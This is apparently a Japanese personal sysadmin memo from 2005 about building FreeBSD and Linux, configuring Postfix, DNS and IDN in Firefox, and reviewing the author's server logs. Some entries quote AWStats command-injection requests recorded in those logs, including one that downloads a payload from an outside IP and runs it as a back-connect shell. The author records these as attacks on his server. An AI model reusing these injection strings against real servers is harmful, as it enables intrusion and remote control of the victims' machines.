僕の備忘録(PC、UN*X、ネットワーク関連が中心)なんです。
自分の書いたところは適当(な時とか)に書き換えますので御了承を。
鯖のcrondとiptablesは自動で有効にはならなかったっけ。サーバプログラム の大半は確認していたが、このあたり忘れるのはヤバい。
茶化すのも飽きてきた。
入れた。だけ。
一旦makeが完了せず、configをもう一度やり直してダメといわれた
オプションを外す。なんかスクリプトを実行すべきらしいが、後で。
$ uname -a Linux $SERVER 2.4.29 #2 Sun Jan 30 17:22:25 JST 2005 i686 unknown
エラーメッセージを読み直して、もう少しスマートにやってみた。 ./configureの後、解凍したディレクトリ直下のconfig.h(*.hはこれだけ しか見当たらない)に
#include <ft2build.h> #include FT_FREETYPE_H
を追記して make 。すると今度は
In file included from /usr/include/png.h:332, from export_png.c:27: /usr/include/pngconf.h:255: error: 構文解析エラー before '.' token make[3]: *** [export_png.o] エラー 1 make[3]: Leaving directory `/home/makoto/src/graph/dia-0.94/app' make[2]: *** [all-recursive] エラー 1 make[2]: Leaving directory `/home/makoto/src/graph/dia-0.94/app' make[1]: *** [all-recursive] エラー 1 make[1]: Leaving directory `/home/makoto/src/graph/dia-0.94' make: *** [all] エラー 2
さてどうしよう。/usr/include/pngconf.h (libpng-1.25)を見てもよくわからなかったが libpng-1.28を落してpngconf.hの同じ所を見ると、INSTALLの最後に意味ありげなコメントが。
If you encounter a compiler error message complaining about the lines __png.h__ already includes setjmp.h; __dont__ include it again.; This means you have compiled another module that includes setjmp.h, which is hazardous because the two modules might not include exactly the same setjmp.h. If you are sure that you know what you are doing and that they are exactly the same, then you can comment out or delete the two lines. Better yet, use the cexcept interface instead, as demonstrated in contrib/visupng of the libpng distribution.
及びその下のディレクトリの属性はデフォルトで700、ファイルが600だった。 ユーザが複数あるとバックアップが面倒だ。あまりスーパーユーザ の出番を増やしたくないが。
を書かずに $mail $MYACC@MYPROVIDER しても、引越先のプロバイダからは
rejectを喰らわなかった。 IPを見て判定してるのかも。
ちなみにこれが抜けると、受けたメールのFrom: と Return-Path: の
ホスト名が、DNSにないFQDNになっている。余所からやれば突っ返された
かもしれない。
cronで毎日、ログのサマリをメールしているシェルスクリプトに、 grep POST $ACCESS_LOG を加えた :-)
sockstat(1)の名前を覚えられない。その都度、
本を引っ張り出して、コマンドの載ってるページを探し回っている。
ちなみに、sock<TAB>と打って気づいたが、PlamoLinuxには
socklist(8)というperlスクリプトがそれにあたる模様。
あとsocklist(8)では、uidが0の項目の内容が変だ。pidやfdまでが0になり、
nameも出ない
(sockstat(1)は関係ないらしい)
$ socklist type port inode uid pid fd name tcp 32769 3344 500 1090 5 kinput2-canna tcp 515 2904 0 0 0 tcp 6000 3306 0 0 0 tcp 5680 3211 0 0 0 tcp 21 2777 0 0 0 tcp 25 2936 0 0 0 tcp 32768 3340 500 1090 4 kinput2-canna tcp 5680 3341 0 0 0 tcp 41605 27626 500 4974 3 ssh tcp 41600 27561 500 4952 3 ssh # socklist type port inode uid pid fd name tcp 32769 3344 500 1090 5 kinput2-canna tcp 515 2904 0 915 6 lpd tcp 6000 3306 0 1074 1 X tcp 5680 3211 0 1024 4 cannaserver tcp 21 2777 0 906 4 inetd tcp 25 2936 0 978 11 master tcp 32768 3340 500 1090 4 kinput2-canna tcp 5680 3341 0 1024 0 cannaserver tcp 41605 27626 500 4974 3 ssh tcp 41600 27561 500 4952 3 ssh
ぐぐっていると、過去の(3.x?)sockstatはPerlスクリプトらしいと書いてある ページもあった。
$ file $(which sockstat)
/usr/bin/sockstat: ELF 32-bit LSB executable, Intel 80386, version 1 \
(FreeBSD), for FreeBSD 5.3.0, dynamically linked (uses shared libs),\
stripped
$ ldd $(which sockstat)
/usr/bin/sockstat:
libc.so.5 => /lib/libc.so.5 (0x28076000)
ツッコミをみて、4.10(98)を確認。
$ file $(which sockstat) /usr/bin/sockstat: a /usr/bin/perl -w script text executable
そういえば昔(いつか忘れた)whichがperlだったことを思い出した。
$ file $(which which)
/usr/bin/which: ELF 32-bit LSB executable, Intel 80386, version 1\
(FreeBSD), for FreeBSD 4.9.1, dynamically linked (uses shared libs), \
stripped
$ ldd $(which which)
/usr/bin/which:
libc.so.4 => /usr/lib/libc.so.4 (0x28067000)
utf-8バージョンを作成。auの携帯で読めるか(読めた)試す。そんだけ。
awstatsなんて置いてないぞ、ここには。と思いつつぐぐると、二つ目に こんなの。 何か面白そうだが、つつくのはまた今度にしよう。
<引用> Box Cracked Some random bits scribbled by Jeremy Zawodny Well, my primary box was cracked by a dipshit going after the recent awstats.pl bug. </引用>
ついでにログも。どこの厨房だろうなぁ。
217.172.168.109 - - [04/Feb/2005:06:40:42 +0900] "GET //cgi-bin/awstats/awstats.pl?\ configdir=|%20id%20| HTTP/1.1" 404 472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" 217.172.168.109 - - [04/Feb/2005:06:40:42 +0900] "GET //cgi-bin/awstats.pl?\ configdir=|%20id%20| HTTP/1.1"404 472 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Version: 6.0.2900.2180.xpsp_sp2_rtm.040803-2158 で 自サイトに初めて アクセスする。うーむ。スタイルシートをもう少しこねようか。 ちなみに、これまで Firefox と w3m でしか見てなかった。
WindowsUpdate。MediaPlayerや郵便番号辞書なんていらない。ので更新なし。
shutdown -s -t 0 ; 余計なところに独自性つけすぎ。
httpをやってなかった事を思い出した。んで、ssh -L 5002:$SERVER:80 $SERVER。
etherealがパケットを拾うのを見ながらw3mやFirefoxで
http://localhost:5002にアクセス。
当り前だが画像までがちゃんと表示された事に不思議な感慨。
時々ACKの立ったTCPパケットがサーバに出ていた(逆は見当たらない)。
ついでにサーバ上で # iptables -A INPUT -p tcp --dport 80 -s $CLIENT -j DROP して(実はこの一行もぐぐりながら書いた)、 http://$SERVER/index.htmlが繋がらなくなった事を確認してから改めて 再度実験。要するにファイアウォール突破である。これもOK。
思ったが、脱線に続く脱線。
違うネットからのsmtpに、sasl認証がうまくいくかどうか、
LANをもう一つ組んでみた(脱線1)。
routeを一つ追加し、両方に跨るPC(FreeBSD5.3)でsysctl net.inet.
ip.forwarding=1。で、どっからもPINGが行き来する。
ただし、腐れルータは複数のLANを設定できないので、新規追加の
ネットワークから外に出れない(ネットワークアドレスを大きく
確保して両者を飲み込むという手もなくはない?)(脱線2)
ついでにDNSも手を入れてみた。ゾーンファイルを書き直す。
正引きから一部削り、逆引きファイルをひとつ named.confに追記。
おっと、シリアル上げ忘れに注意。で、各々のホスト名が正、逆とも返る
ことを確認。(脱線3)
続きは後で。
これも
postfixの本で(特にSASLを絡ませる部分を)頭をよくこねてから入れる。
Plamoパッケージで入ってた前のバージョンをremovepkgしてから、
$SRC/postfix-2.1.5/html/SASL_README.htmlをさっと眺めて、
(for SASL version 2.1.1): $ make makefiles CCARGS="-DUSE_SASL_AUTH -I/usr/local/include/sasl" \ AUXLIBS="-L/usr/local/lib -lsasl2" $ make && sudo make install # echo smtpd_sasl_auth_enable >> /etc/postfix/main.cf # echo " permit_sasl_authenticated" >> /etc/postfix/main.cf # echo "pwckeck_method: auxprop" >> \ /usr/local/lib/sasl2/smtpd.conf # ln -s /etc/postfix/aliases /etc/aliases && newaliases
起動させてテストメール。
を、しばらく眠っていたデスクトップに入れた。ln -s /usr/local/ssl/include/openssh /usr/inclde/openssh しないと --with-ssl=の下をどう書いてもmakeが通らなかった。また、saslauthd/auth_getpwent.c も、エラーメッセージを見て 一行書き換えないとmakeが途中で止まってしまった。このノートに入れたときはそんなに試行錯誤した覚えはないのだけど。 とにかくmake install。次はPostfixにIMAPか。
Plamoのリリースバージョンを確認。FAQだったはずだが、ええと... /usr/lib/setup/の下に バージョン番号を表す空っぽのファイルが入ってる。ノートもデスクトップも4.0だ。
変なサイトにヒットしてしまった。こりゃ一体何の役所だ?
いや、I'm Feeling Lucky で q=$(echo カワサキ|hexdump|sed 's/^0 * //'
|sed 's/ /%/g')しただけなんですが。
のアドレスバーに"NEC"とか"富士通"とか打ち込むと
大体そっちのサイトに接続してくれるようだ。
例によってetherealでキャプチャしながら、"トヨタ"と打ち込んでみた。
最終的には
トヨタ自動車株式会社 グローバルサイトに出た。が、キャプチャ結果
は随分と珍妙だった。
まず、DNSサーバのMACアドレスを確認した後、どういう訳か xn--5ckr0h をクエリーしている(当然No such name)。ぐぐるとxn--5chr0h.netが お名前.COMであった。が、DNS queryではxn--5chr0h.netを探してはいない。 その次におそらくキャッシュでも効いていたのか、やにわに 64.233.189.104(googleらしい)にこんなのを投げてる。
Get /search?btnI=I%27m+Feeling+Lucky&ie=UTF-8&oe=UTF-8&q=%E3%83%88\ %E3%82%BF HTTP/1.1\r\n Host: www.google.com\r\n (以下環境変数が続く)
で、その後にDNSを引いて、目的のサイトに至る。
"トンボ"で試すと、株式会社トンボ鉛筆 に出る前にxn--fdkxbxdを引いていた(今のところ正体不明)。 No such nameの後にwww.google.comのアドレスを尋ねて、I'm Feeling Lucky。
えと、Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20041001 Firefox/0.10.1だ。そろそろageようか。
後記。
$ echo トンボ|idnconv -> xn--fdkxbxd $ echo トヨタ|idnconv -> xn--5ckr0h
"どうさかんきょう"をcannaで変換すると"どう目教"となった。"目教"って何だ? ぐぐっても"猫目教"(演劇)とか、'"目教" -猫'にしても"目黒区教育委員会"とか 関係なさげなのばっかりヒットしてばっか。じゃないの。
メッセージ内の "^From " の扱いはどうだったっけ。ええと、Postfix2.1.5 + qpopper4.0.5 だ。
$ echo -p 'hello\nFrom I\nbye.' | mail -s testmail $ADDR $ grep "^From " /var/mail/$ADDR From $ADDR Mon Feb 7 12:33:03 2005 From: $ADDR >From I $ emacs -nw -f mew Subject: testmail From: $ADDR To: $ADDR Date: Mon, 7 Feb 2005 12:28:48 +0900 (JST) hello >From I
mewから送信しても、やっぱり同じ。
$ cat foo.pdf foo.pdf >bar.pdf
しても、ファイルサイズが膨れるだけで、何も変らない。
jpgも然り。
Winからping打つとreplyがあったのにLinuxからだと無反応。etherealも
何もなし。パーソナルファイアウォールを思い出し、replyを返す設定だけ
チェック。
Winからftp叩いてもつながらない。あ、/etc/hosts.denyではねていたっけ。
これも修正。あ〜めんど。
おまけ。winのftp.exeって、デフォルトがasciiモードだったのか。
道理でバイナリファイルがことごとく壊れてた訳だ。(man ftp すると、UN*X系OSもそうらしい)
/28から/27に広げた。ついでKNOPPIXやWinXP向けの/etc/dhcpd.conf見直し。 なぜか/27でブロードキャストが63になっていた。 これも/27、ブロードキャスト31、割り当てを20-30にする(19以下は固定向け)。 ifconfigでアドレスを書き換えたら、外に出れなくなった。 当然デフォルトルートも追記しないと。
なんてのもあったんだ〜。man 6 countmail するとSEE ALSO に from(1)てのも あった。古き良き時代の遺産なのか?
$ countmail from: can't read /var/mail/$USER. ZERO! ZERO MAIL MESSAGES! HAHAHAHAHA!
がトップページ以外も見るようになってきた。らしい。GET / でも GET /robots.txt でもないgooglebotのアクセスが9件。
ぐぐってヒットした @ITの記事から、 辿った リンク先で紹介されていた 変換ツール をget。あっさりmake install。
$ echo "お名前.com" |idnconv xn--t8jx73hngb.com $ w3m http://$(echo "そいつ殺せない.どいて.お兄ちゃん.jp" | idnconv)
は、Firefoxでも使えるらしい。ロケーションバー(と呼ぶらしい)に、
http://www.お名前.com と入力すると、http://www.onamae.comに
つながった。
http://www.マイクロソフト.comと打ち込むと、
http://www.xn--eckwa6b3bwd6b6f.comに飛んだ。明らかに国際化ドメインの
ジョークサイトだった。
etherealで追っかけると、DNSで上のサイトが返って来ていた。
もう一つ、テスト。
これはリンク先を以下のように
書いたもの。 Firefoxでは通ったが、 w3mでは駄目だった。
<a href="http://www.お名前.com">
しっかし、そこまで行くんなら、http://七階.なんとか株式会社.企業. 程度にはならないと、とか。思ってたら、 こんなの。
http://そいつ殺せない.どいて.お兄ちゃん.jp/ http://xn--n8ja2eg0bzb0969f.xn--n8j8ch.xn--t8j3b8esc273u.jp
これまた余計。Firefoxでは、ロケーションバーにはリンクした文字列だけが 表示される。従って、 こちらは ここと同じだけど、表示は別々になっている。
4.10からageるのに7時間位かかった(Pentium166MHz,Mem64MB)。
$uname -a FreeBSD host.domain.tld 4.11-RELEASE FreeBSD 4.11-RELEASE #0: \ Wed Feb 9 20:01:02 JST 2005 root@host.domain.tld:\ /usr/obj/usr/src/sys/$MYKERNEL i386
$ true 2>1 > /dev/null ; if [ "$?" = 0 ]; then echo ok ;\ else echo ng; fi ok $ false 2>1 > /dev/null ; if [ "$?" = 0 ]; then echo ok ;\ else echo ng; fi ng
make bulidworld を実行しているうちに思い付いた。判定後に
メール送信スクリプトを持ってくれば、終るまでは端末を見張らなくてもいいはずだ。
えーと、FreeBSD(98)4.10についてる/bin/shは >& を解しないのかな。
元プロバイダにも(今回は意図したもの。つまり悪戯だ)打ってみたが、 一度接続に来ただけでそれっきり。
自サイト向けの存在しないユーザ宛メールを(断言する。故意ではない)
打ってしまった。
プロバイダのsmtp鯖はこんな風にリトライを続けた。2回目以降、初回と違う
ホストからアクセスが掛かっていた。
プロバイダからの返送はまだ来ていない。こちらで新しいユーザを作るまで
続くかもしれない。
1 Feb 8 21:43:07 $MSERVER postfix/smtpd[22853]: NOQUEUE: reject: ; 初回 2 Feb 8 21:46:45 $MSERVER postfix/smtpd[22856]: NOQUEUE: reject: ; 3 Feb 8 22:21:08 $MSERVER postfix/smtpd[22894]: NOQUEUE: reject: ; (以降30分から1時間おきにアクセスの繰り返し) $ grep $WRONG_ACCOUNT $MAILLOG |wc -l 67
ここに来た者も徐々に増えてる...のか?ログを見直すと、2月6-7日に googlebotがあちこち掘り返していたが。
man true とか LANG=C man false とかしているうちに ture と false が bash(2.05b.0(1)-releaseで確認)の内部コマンドでもあるらしい事に気づく。 tcsh(tcsh 6.12.01 (Astron) 2003-02-08 (i386-intel-linux) options 8b,nls,dl,al,kan,rh,color,dspm,filec,dspl)にはないらしい。
$ true --help && echo "$?" 0 $ /bin/true --help && echo "$?" Usage: /bin/true [ignored command line arguments] or: /bin/true OPTION Exit with a status code indicating success. These option names may not be abbreviated. --help display this help and exit --version output version information and exit Report bugs to <bug-sh-utils@gnu.org>. 0 $ which true /bin//true
/bin/{true}{false} --version で首をひねった。"Written by no one."って 何だ?
FreeBSD(98)-4.11で見たところ、bash1(1.14.7(1)) とtcsh(tcsh 6.12.00 (Astron) 2002-07-23 (i386-intel-FreeBSD) options 8b,nls,dl,al,kan,sm,rh, color,dspm,filec)にはなさそうだった。
で少し遊ぶ。
UN*X上で使う記事に貼ってあったソースを切り取り、uudecode する。できた
tarballを展開し、gcc -o filename nanba160.c 。
辞書は
Vectorにあるオリジナル版に同梱されている辞書ファイル等をUN*X向けに加工する
(nkf -X -e -d等)。
以下、実行例( -v:標準出力のみ、-sNUM:出力行数、-iDIC:辞書ファイル(拡張子
省略可))。
$ nanba160 -v -s2 -inanba 石燈篭だけが殺すし、大々的にそれにしてもスチュワーデスを手に入れるとは\ サンバのリズムで辛さ3倍でしょう。幼女もウィルスを繰り広げるよーですが\ 狂う時ゲロを吐くなんて信じられません。オリジナリティの野郎が竹輪を切り\ 刻むはずなので謹んで埴輪を買うのだーだーだー。九次元世界の霊格が脳みそ\ 腐るので用心したほうがいいでしょう。 パンチパーマはわななくんでしょーか。火星人はますます呪いを推進し、その\ うち必ず死ぬ必要は別にありません。特に包丁がおののき、陰謀のくせに美し\ いので危険です。何となく能面だってしかも咲き乱れるとゆーことでしょう多分。
他にCGI化などもあるらしい。
貰ったものは全部
こっちにコピーしておいた。
ライセンス的には問題ないだろう(以下、
nanba.doc
(.docだが、Shift-JISのテキスト形式だ)より引用)。
★ 使用条件その他 このソフトを販売して利益を得ることはいけませんが、それ以外であれば使用目 的・使用方法等に関して制限はありませんので御自由にお使いください。ただし このソフトの内容や動作について作者は一切責任を負いません。 このソフトを使って作成した文書を公表する場合、ソフトの使用者が自己の責任 において行なってください。公表した結果何らかのトラブルが発生したとしても 作者は対応いたしかねます。 このソフトはいちいち作者に断らずに他ネット等へ転載してもかまいません。改 造したファイルの再配布や自作辞書ファイル等の発表についても制限はありませ んので、どんどん無断で行なってください。
も一つコピペしようか、と思ったが結局コメントアウト、、、
システムを全部一遍にアップグレード、は諦めた。
とりあえず別PCのFreeBSD(98)-4.11のソースを、nfsサーバから
exportしたディレクトリにftpでgetする。
実は当初クライアント側にputしたが、遅いのを我慢したのは失敗だった。
まずはGENERICカーネルの構築から。現在要らなそうなデーモン達は適当に
休ませた。sshdまでkillしたので、しばらくは/dev/ttyd0だけ
が生命線。という形で実行。
13:22:25 JST make depend begin 14:15:25 JST make depend end ; make dependに約53分。 15:08:09 JST make begin 19:38:22 JST make end ; make に約4時間30分。 22:46:17 JST make install begin 22:50:50 JST make install end ; make installに約4分。 FreeBSD $host.domain.tld 4.11-RELEASE FreeBSD 4.11-RELEASE #0:\ Fri Feb 11 16:51:17 JST 2005 root@$host.domain.tld: \ /usr/mnt/src/sys/compile/GENERIC i386
それはいいけど、ps(1)とかtop(1)とかが動作しない。やっぱり 全部4.11でないと駄目?
かな漢字変換サーバと通信できません。になった。 とりあえずEmacs+anthyで続行。
$ kill -9 `cat ~/.kinput2.PID && rm ~/.kinput2.PID # cannakill # /etc/rc.d/init.d/canna.r start $ kinput2 &
アップグレードの始まり。
FreeBSD(98)-4.8 → 4.11。初めて買ったPC(じゃないが)。
CPU:PentiumODP 83MHz、Mem:20MB。
"国民機"という造語の発祥元による"国民機"である。HDDは4台目、メモリは
3本挿し、ビデオカードも1Mから2Mに増設はしたが、多分使われていない(筈)。
CPUはバグつきのODPだ(元486DX-66MHz)。
FreeBSD-5.3からnfsマウントして、まずportsのtarボールを展開(packageは
もう無いみたい)。cvsupをmake install しようとすると、(portsの
設定ファイルをどこか書き換えた、筈)
始めたのは午前10時位から。が、芋づる式に入れたlibiconvのmakeがerrでStop.
さてどうしようか。クリーンインストールが一番手っ取り早いのは百も承知
で、もう少し悪あがき。
操作はnoteからsshしたPC(NFS鯖とは別)からkermitでttyd0より入り、 そこでrootになった。 どうせnoteを消せないなら素直にsshで入るか、でなければ別PCに モニタとキーボードをつけてそっちからsshした方がよかったかも。
idn(Internationalized Domain Name)機能は
(アドレスロケーションバーが騙されるので)結局無効にした。
~/.mozilla/firefox/default.jcn/compreg.datの
@mozilla.org/network/idn-service;1,{62b778a6-bce3-456b-8c31-2865fbb68c91}
を、
@mozilla.org/network/idn-service;0,{62b778a6-bce3-456b-8c31-2865fbb68c91}
に修正。
ついでに(こっちが先だが)Firefoxからabout:configにアクセスすると
出てきたメニューをスクロールしてnetwork.enableIDNをtrue(デフォルト)から
falseに変えても同様。
参考にしたサイトは セキュリティホールmemoと、その リンク先。
味わい、それは sl(1)くらいしかなさそうだ。シリアルコンソール経由も 乙なもの。他の端末から sl > /dev/ttyd0 などとした方が微妙に速く見えた。
nfsクライアントが make している間、nfs サーバのみならず ADSLルータがぴこぴこ点滅していた。 クライアント側でifconfig すると、/29 になっていた。サーバのIPは その彼方、要するに /27 の中にある。 そっちまで行くために、デフォルトゲートウェイに設定している ADSLルータを介していたのだった。 ifconfigをやり直し、/etc/rc.confを書き換えて改めてmountする。 ルータはおとなしくなった。
Stop in /usr/mnt/src. *** Error code 1
GENERICじゃないカーネルができたようだ。make buildworldするか。
しかし、できかけのシステムを/usr/objなんかでゴリゴリ
やったんではかなわない。違うディレクトリでやるには
どうしたらいいんだろうな。
適当に Makefileなどを見ているうちに MAKEOBJDIRPREFIX という変数に
気づく。ぐぐると
こんなの。念のために引用。
142 名前:名無しさん@お腹いっぱい。投稿日: 02/06/24 14:07
make worldを/usr/obj外のディレクトリで行う事はできるでしょうか?
143 名前:名無しさん@お腹いっぱい。投稿日: 02/06/24 14:35
>>142
/etc/make.conf に MAKEOBJDIRPREFIX=/hoge だな。
src/Makefile.inc1 見れ
144 名前: 142 投稿日: 02/06/24 15:03
>>143
ありがとうございます。
助かりました。
Firefoxをアップデート。
ringサーバから貰って来たアーカイブを展開し、/usr/localの
下にコピーする。前バージョンのディレクトリのpluginsから
libflashplayer.soをコピーする。なにげに起動が速くなった。
ついでに日本語表示がお気楽。
えーと、Mozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.7.5) Gecko/20041108
Firefox/1.0 である。idn-serviceは初回起動時にデフォルトで有効に
なるらしい。勿論無効にする。その他の設定は概ね前と同じだった。
大阪駅へ歩き、ことらぐのお茶会に参加。WineのHackerを囲んで WineやCodewaversの話題が咲き乱れていた。 回転寿司にスタバ。おまけにおでんをつまんで 乾杯。NTFSをmountするオプションに uid=NUM,gid=NUMがある 話を聞く。JMANに明記されていたことを後付けで知った。
変なログ。これは勘違いや嫌がらせではなかろう。
201.8.98.44 - - [12/Feb/2005:02:00:49 +0900] \ "GET /awstats/awstats.pl?configdir=|echo;%20echo;%20ls;%20echo;%20echo| \ HTTP/1.0" 404 472 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
まあ、此 に比べればまだ手ぬるいかも。
221 :212:05/02/05 01:26:39 ID:xJZHVJAK
スレ違いだけど、こんな感じでやられました。
"GET /cgi-bin/awstats.pl?configdir
=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwget%2066%2e90%2e116%
2e37%2fdc%2eexe%3bmv%20dc%2eexe%20love%2epl%3bchmod%20777%20love%
2epl%3bperl%20%2e%2flove%2epl%2069%2e158%2e57%2e20%2020001%3bid%
3buptime% 3becho%20e_exp%3b%2500 HTTP/1.1" 200 8 07 "-" "-"
222 :login:Penguin:05/02/05 02:00:34 ID:XQoynZ2n
>>221
AWStatsの脆弱性を突かれましたな。
アクセス解析ツールにバグ、人気Blogが改ざんの被害に
http://www.itmedia.co.jp/enter
Debianをインスコする文書があった。知ったのは
スラド本家記事から。
さっとなでてみたが、割と懇切丁寧な印象。まあ手順だけを言えば、
要はAT互換機と大して変らない。MacOSXのシステムCDからブートして
パーテーションを切り直し、MacOSXを再インストール(fipsやntfsresize
のようなツールはないのかしら)。DebianのCDからブートして、空けた
領域にDebianをインスコ。後はapt-get。
手許の
鏡餅でもいけるはずである。そのうちに。
メールを打って確認。ASCIIなら20文字、X0208なら 10文字以下で改行するのがよさげ。
on Pen86MHz with Mem20MB。
/usr/src と /usr/obj を それぞれ別のマシンから nfs させて貰って make buildworld 再試行。
make している間、CPUの遅さのせいかメモリの少なさの為か2GBのSCSI-HDDの
鈍さが災いしたかC-Bus経由が故か 10Base-Tが悪いのか、
ともかくリモートからtopで眺めたnfsサーバはどちらも暇そうだった。
15時か16時位にEnterキーを押下したが、今日中には終らなかった。
#!/bin/sh
SEARCH=$(echo $* | nkf -s | sed 's/ /\+/')
BOTTOM="btnG=Google+%E6%A4%9C%E7%B4%A2"
HL=ja
w3m "http://images.google.co.jp/images?q=${SEARCH}&hl=${HL}&${BOTTOM}"
のぞみで東京へ。秋葉原はミツワビル(ぷらっと寂れた!) と秋月とラジオデパートで敗退。
あのメールをしつこく送信するようになってきた。
昨日の夕方まで忘れられていたようだったが、さては見たな。
; 古いログ総ざらえ。要するに一件だけ。
$ for file in $MAILLOG.*.gz;
do gzip -dc $file | \
grep $WRONG_ACCOUNT
done \|
wc -l
1
; 昨日やにわに
$ grep $WRONG_ACCOUNT $MAILLOG|cut -d" " -f 1-3|cat -n
1 Feb 15 19:09:05
2 Feb 15 19:13:45
3 Feb 15 19:16:46
4 Feb 15 19:19:12
5 Feb 15 19:20:59
6 Feb 15 19:22:01
7 Feb 15 19:29:58
8 Feb 15 19:35:49
9 Feb 15 19:39:16
10 Feb 15 19:41:00
11 Feb 15 19:50:13
12 Feb 15 19:52:04
13 Feb 15 19:55:43
14 Feb 15 20:01:29
15 Feb 15 20:04:03
16 Feb 15 20:30:00
17 Feb 15 20:46:59
18 Feb 15 21:58:54
19 Feb 15 22:56:29
20 Feb 16 00:33:12
200.217.80.93 - - [17/Feb/2005:12:05:37 +0900] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.0" 404 472 "-" "MSFrontPage/4.0" 200.217.80.93 - - [17/Feb/2005:12:05:37 +0900] "PUT /www.arplhmd.cjb.net_233515 HTTP/1.0" 405 243 "-" "Microsoft Data Access Internet Publishing Provider DAV 1.1"
ステータスコードが405なんて初めて見た(気がする)。
あと、googlebotの跡は304が結構あった。
2005/02/18 01:53:21 PPP-IPCPの確立 [メインセッション] 2005/02/18 01:53:11 PPP-LCPの確立 [メインセッション] 2005/02/18 01:52:36 PPPoE セッション開始成功 [メインセッション] 2005/02/18 01:52:36 PPPoE AC発見成功 [メインセッション] 2005/02/18 01:52:36 PPPoE AC発見失敗 [メインセッション] (PPPoE AC発見失敗が33回連続) 2005/02/18 01:36:04 PPPoE AC発見失敗 [メインセッション] 2005/02/18 01:36:00 PPPoE セッション停止(自分から) [メインセッション] 2005/02/18 01:36:00 PPPの切断(相手からの切断) [メインセッション] 2005/02/13 11:13:55 ADSL回線通信中へ移行
イベント直前に燃え上がるのは普通か。
grep $host $MAILLOG Feb 15 23:40:53 $MSERVER server[PID] $ESMTP: from=$host Feb 16 00:07:29 $MSERVER server[PID] $ESMTP: from=$host Feb 18 09:27:48 $MSERVER server[PID] $ESMTP: from=$host Feb 18 10:33:07 $MSERVER server[PID] $ESMTP: from=$host Feb 18 11:08:46 $MSERVER server[PID] $ESMTP: from=$host Feb 18 13:19:13 $MSERVER server[PID] $ESMTP: from=$host Feb 18 13:34:08 $MSERVER server[PID] $ESMTP: from=$host Feb 18 14:52:36 $MSERVER server[PID] $ESMTP: from=$host Feb 18 16:10:12 $MSERVER server[PID] $ESMTP: from=$host Feb 18 16:13:24 $MSERVER server[PID] $ESMTP: from=$host Feb 18 16:17:49 $MSERVER server[PID] $ESMTP: from=$host Feb 18 16:20:49 $MSERVER server[PID] $ESMTP: from=$host Feb 18 18:57:35 $MSERVER server[PID] $ESMTP: from=$host Feb 18 20:28:52 $MSERVER server[PID] $ESMTP: from=$host Feb 18 20:56:49 $MSERVER server[PID] $ESMTP: from=$host Feb 18 21:23:03 $MSERVER server[PID] $ESMTP: from=$host
なんか隠蔽省略しすぎ。早く寝ないと。
午前8時15分頃の出発は、結果的にはギリギリであった。普通電車2本に 超特急、続いて特急と乗り継ぎ、のんびりした普通電車に、偶然拾ったバスで、 予定時刻の14時直前に 情報処理センターでなく、その前の長広ビル3 F(ハル情報ネットワーク)に、どうにか到着。無線LANに入れなかったのは 残念。Fedoraや地域ネットワーク等を肴に、久方振りの歓談、そして 豊年満作にて飽食。 前例のごとく、帰りは22時32分発の 特急一本でひと晩、終点ひと駅前で下車。
あとでもう少し、書こ。書いた。
Googlebotが日記をしつこく舐めに来た。 Refererがgoogleの検索結果らしいログもちらほらしていたから、それなりに 価値がでてきたのだろうか。
$grep -i googlebot $TODAY_AGENT_LOG | wc -l 215 $grep -i googlebot $TODAY_AGENT_LOG_OF_DIARY | wc -l 164
$ ssh-agent SHELL でもよかった。
自分の日記ページのリンクは、httpから全部を絶対パス指定するより、 このように相対指定した方が、ドメインが変ったりした場合への備えとしては 有効だろう。
<a href="?date=YYYYMMDD#pNUM">西暦何年何月何日の日記、何段落目</a>
ただし、アクセスログも相対指定に変るので、grepの時は注意しないと。
# atd # ls /var/run/atd.pid /var/run/atd.pid $ cat script.file #!/bin/sh ls > $HOME/hogehoge.txt $ at 13:21 [Feb [21 [2005]]] < script.file warning: commands will be executed using /bin/sh job 15 at 2005-02-21 13:21 $ ls --full-time $HOME/hogehoge.txt -rw-r--r-- 1 USER GROUP 1347 2005年02月21日 \ 13時21分00秒 hogehoge.txt $ echo DISPLAY=localhost:0.0 \ /usr/X11/lib/X11/afterstep/plamo_banner | at +1minutes
ここまで来るのに、自分から自分へのエラーメールを一杯頂戴した。
以下、サーチエンジンに嗅がせるキーワードを列挙しておくか。
Linux,UNIX,指定時刻,実行,コマンド,指定時刻に実行,
指定時刻にコマンドを実行する,指定時刻に実行するコマンド,
決まった,決まった時刻,決まった時刻に実行,
決まった時刻にコマンドを実行,
スクリプト,スクリプトファイル,シェルスクリプト,
command,shellscript,scrpit"at",'at',
at,/bin/at,/usr/bin/at,atd,/sbin/atd,/usr/sbin/atd,
at(1),atd(8),"man 1 at","man 8 atd" ...もう飽きた。
何度も、
何度も、
何度も、
何度も、
粘ったが、結局
結局4.8からのアップグレードは諦めて、新規に入れ直す。
ダウンロードしたパッケージのうち、使ったのは
/floppy98/kern144.flp と 同じく/mfsroot.flp だけだった。
もちっと気をつけないと。
とりあえず環境設定。
vipwで一般ユーザを作り、/etc/groupの最初(wheel)に追記。
ホームディレクトリを掘ってchown し、passwd NEWUSER。
シリアルコンソール。
/etc/ttys の ttyd0 の行を書き換える。
ttyd0 "/usr/libexec/getty std.9600" dialup off secure を
ttyd0 "/usr/libexec/getty std.9600" vt100 on insecure
に修正。んで kill -HUP 1
では早速 /usr/src を他からnfsして、make config。
復帰すると、挿したままのUSBマウスが死んでいた。 modprobe -r uhci_hcd && modprobe uhci_hcd により、抜き挿しなしで回復する模様。
Plamo Linux Expertをめくる。
$ diff XF86Config.old XF86Config.new 231c231 < Option "Protocol" "PS/2" --- > Option "Protocol" "IMPS/2"
Xを再起動し、USBのスクロールマウス(PS2のおまけ)を挿す。
適当にぐりぐりすると、画面もなんなく
グリグリ。中ボタンのペーストも(以前通り)OK。
でもLJ700のタッチパッドは以前通り、スクロールできなかった。
ちなみに(?)Acrobat Reader5.0.10 では、今のところスクロールが使えていない
make buildworld にとりかかる。その際、nfsでちょっと嵌った。
